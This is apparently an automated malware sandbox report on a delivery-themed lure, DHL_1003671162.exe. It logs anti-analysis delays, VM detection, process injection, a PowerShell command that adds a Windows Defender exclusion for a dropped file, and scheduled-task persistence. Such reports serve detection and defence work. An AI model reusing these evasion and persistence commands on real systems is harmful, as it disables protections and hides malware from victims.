                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99859Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99733Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99625Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99515Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99406Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99296Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99187Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 99077Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98969Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98844Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98735Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98610Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98485Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98371Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98141Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 98016Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 97904Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 97797Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99450Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99325Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99217Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99108Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 99000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98343Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99780
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99671
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99562
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99436
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99219
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99094
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98984
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98849
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98734
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98624
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98516
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98391
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98266
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99781
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99671
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99560
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99453
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99339
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99234
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99124
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99015
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98890
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98780
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98671
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98561
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98451
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98338
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98208
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: DHL_1003671162.exe, 00000000.00000002.1706065904.0000000008960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: boqXv.exe, 00000014.00000002.2925216759.00000000014B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                      Source: qmUxKv.exe, 0000000B.00000002.2925539343.000000000123B000.00000004.00000020.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1895522275.0000000001599000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: DHL_1003671162.exe, 00000006.00000002.2929626503.0000000001178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory written: C:\Users\user\Desktop\DHL_1003671162.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory written: C:\Users\user\AppData\Roaming\qmUxKv.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory written: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory written: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Users\user\Desktop\DHL_1003671162.exe "C:\Users\user\Desktop\DHL_1003671162.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeProcess created: C:\Users\user\AppData\Roaming\qmUxKv.exe "C:\Users\user\AppData\Roaming\qmUxKv.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Users\user\Desktop\DHL_1003671162.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
